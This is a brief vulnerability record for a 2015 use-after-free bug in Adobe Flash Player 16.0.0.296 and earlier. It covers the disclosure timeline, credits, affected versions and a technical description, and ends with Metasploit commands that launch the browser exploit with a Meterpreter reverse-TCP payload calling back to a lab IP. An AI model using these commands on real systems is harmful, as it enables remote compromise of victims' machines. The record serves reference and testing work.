Timeline :
Vulnerability found exploited in the wild by TrendMicro in January 2015
Patch provided by the vendor via APSA15-02 the 2015-02-02
Details of the vulnerability provided by TrendMicro the 2015-02-04
Metasploit PoC provided the 2015-03-28
PoC provided by :
Unknown
hdarwin
juan vazquez
Reference(s) :
Affected version(s) :
Adobe Flash Player 16.0.0.296 and earlier versions for Windows and Macintosh
Tested onĀ :
Windows 7 SP1 with IE 8 and Flash 16.0.0.296
Description :
This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, which can fill the memory and notify the main thread to corrupt the new contents. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 16.0.0.296.
Commands :
use exploit/windows/browser/adobe_flash_worker_byte_array_uaf set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid